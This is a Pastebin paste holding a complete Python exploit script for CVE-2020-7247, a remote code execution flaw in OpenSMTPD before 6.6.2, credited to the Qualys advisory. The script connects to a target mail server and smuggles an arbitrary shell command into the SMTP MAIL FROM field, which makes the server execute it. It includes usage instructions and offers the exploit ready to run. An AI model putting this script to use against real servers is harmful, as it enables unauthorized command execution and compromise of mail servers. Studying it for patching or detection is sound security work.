hadipras

OpenSMTPD 6.6.2 - Remote Code Execution

Feb 6th, 2020
485
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.94 KB | None | 0 0
  1. # Exploit Title: OpenSMTPD 6.6.2 - Remote Code Execution
  2. # Date: 2020-01-29
  3. # Exploit Author: 1F98D
  4. # Original Author: Qualys Security Advisory
  5. # Vendor Homepage: https://www.opensmtpd.org/
  6. # Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1
  7. # Version: OpenSMTPD < 6.6.2
  8. # Tested on: Debian 9.11 (x64)
  9. # CVE: CVE-2020-7247
  10. # References:
  11. # https://www.openwall.com/lists/oss-security/2020/01/28/3
  12. #
  13. # OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately
  14. # escape dangerous characters from user-controlled input. An attacker
  15. # can exploit this to execute arbitrary shell commands on the target.
  16. #
  17. #!/usr/local/bin/python3
  18.  
  19. from socket import *
  20. import sys
  21.  
  22. if len(sys.argv) != 4:
  23.     print('Usage {} <target ip> <target port> <command>'.format(sys.argv[0]))
  24.     print("E.g. {} 127.0.0.1 25 'touch /tmp/x'".format(sys.argv[0]))
  25.     sys.exit(1)
  26.  
  27. ADDR = sys.argv[1]
  28. PORT = int(sys.argv[2])
  29. CMD = sys.argv[3]
  30.  
  31. s = socket(AF_INET, SOCK_STREAM)
  32. s.connect((ADDR, PORT))
  33.  
  34. res = s.recv(1024)
  35. if 'OpenSMTPD' not in str(res):
  36.     print('[!] No OpenSMTPD detected')
  37.     print('[!] Received {}'.format(str(res)))
  38.     print('[!] Exiting...')
  39.     sys.exit(1)
  40.  
  41. print('[*] OpenSMTPD detected')
  42. s.send(b'HELO x\r\n')
  43. res = s.recv(1024)
  44. if '250' not in str(res):
  45.     print('[!] Error connecting, expected 250')
  46.     print('[!] Received: {}'.format(str(res)))
  47.     print('[!] Exiting...')
  48.     sys.exit(1)
  49.  
  50. print('[*] Connected, sending payload')
  51. s.send(bytes('MAIL FROM:<;{};>\r\n'.format(CMD), 'utf-8'))
  52. res = s.recv(1024)
  53. if '250' not in str(res):
  54.     print('[!] Error sending payload, expected 250')
  55.     print('[!] Received: {}'.format(str(res)))
  56.     print('[!] Exiting...')
  57.     sys.exit(1)
  58.  
  59. print('[*] Payload sent')
  60. s.send(b'RCPT TO:<root>\r\n')
  61. s.recv(1024)
  62. s.send(b'DATA\r\n')
  63. s.recv(1024)
  64. s.send(b'\r\nxxx\r\n.\r\n')
  65. s.recv(1024)
  66. s.send(b'QUIT\r\n')
  67. s.recv(1024)
  68. print('[*] Done')
Advertisement
Add Comment
Please, Sign In to add comment